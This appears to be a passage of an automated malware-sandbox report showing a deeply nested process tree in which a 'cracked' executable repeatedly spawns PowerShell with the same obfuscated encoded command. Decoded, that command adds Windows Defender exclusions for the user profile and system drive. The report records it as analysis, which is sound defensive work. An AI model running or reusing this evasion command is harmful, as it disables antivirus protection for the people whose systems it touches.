        60⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6072
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        60⤵
        Executes dropped EXE
        
        PID:6284
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        60⤵
        System Location Discovery: System Language Discovery
        
        PID:2008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        61⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6660
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        61⤵
        Executes dropped EXE
        
        PID:6880
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        61⤵
        
        PID:1440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        62⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        62⤵
        Executes dropped EXE
        
        PID:3832
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        62⤵
        
        PID:5736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        63⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5832
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        63⤵
        Executes dropped EXE
        
        PID:7160
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        63⤵
        
        PID:7144
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        64⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5332
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        64⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1104
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        64⤵
        
        PID:6688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        65⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6656
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        65⤵
        Executes dropped EXE
        
        PID:3764
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        65⤵
        System Location Discovery: System Language Discovery
        
        PID:5532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        66⤵
        
        PID:5208
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        66⤵
        
        PID:4196
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        66⤵
        
        PID:6820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        67⤵
        
        PID:6816
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        67⤵
        
        PID:4844
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        67⤵
        
        PID:5712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        68⤵
        
        PID:6968
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        68⤵
        
        PID:3068
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        68⤵
        
        PID:7096
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        69⤵
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        69⤵
        
        PID:3292
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        69⤵
        
        PID:6060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        70⤵
        System Location Discovery: System Language Discovery
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        70⤵
        
        PID:3092
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        70⤵
        
        PID:6444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        71⤵
        
        PID:6072
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        71⤵
        
        PID:5520
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        71⤵
        System Location Discovery: System Language Discovery
        
        PID:5140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        72⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        72⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        72⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        73⤵
        
        PID:6228
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        73⤵
        
        PID:5200
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        73⤵
        
        PID:5804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        74⤵
        System Location Discovery: System Language Discovery
        
        PID:2784
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        74⤵
        
        PID:5144
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        74⤵
        System Location Discovery: System Language Discovery
        
        PID:3380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        75⤵
        System Location Discovery: System Language Discovery
        
        PID:3152
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        75⤵
        
        PID:4832
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        75⤵
        
        PID:6768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        76⤵
        
        PID:5416
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        76⤵
        
        PID:5172
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        76⤵
        
        PID:6048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        77⤵
        
        PID:6928
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        77⤵
        
        PID:7032
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        77⤵
        
        PID:5728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        78⤵
        
        PID:4632
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        79⤵
        
        PID:5132
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        78⤵
        System Location Discovery: System Language Discovery
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        78⤵
        
        PID:7060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        79⤵
        
        PID:6952
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        79⤵
        
        PID:924
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        79⤵
        
        PID:7108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        80⤵
        System Location Discovery: System Language Discovery
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        80⤵
        
        PID:6116
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        80⤵
        
        PID:1840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        81⤵
        
        PID:6308
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        81⤵
        
        PID:6208
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        81⤵
        
        PID:6904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        82⤵
        
        PID:5476
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        82⤵
        
        PID:3464
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        82⤵
        
        PID:2920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        83⤵
        
        PID:5740
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        83⤵
        
        PID:6000
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        83⤵
        
        PID:5192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        84⤵
        
        PID:7128
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        84⤵
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        84⤵
        
        PID:4888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        85⤵
        
        PID:1060
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        85⤵
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        85⤵
        
        PID:6636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        86⤵
        
        PID:1740
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        86⤵
        
        PID:5860
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        86⤵
        
        PID:1932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
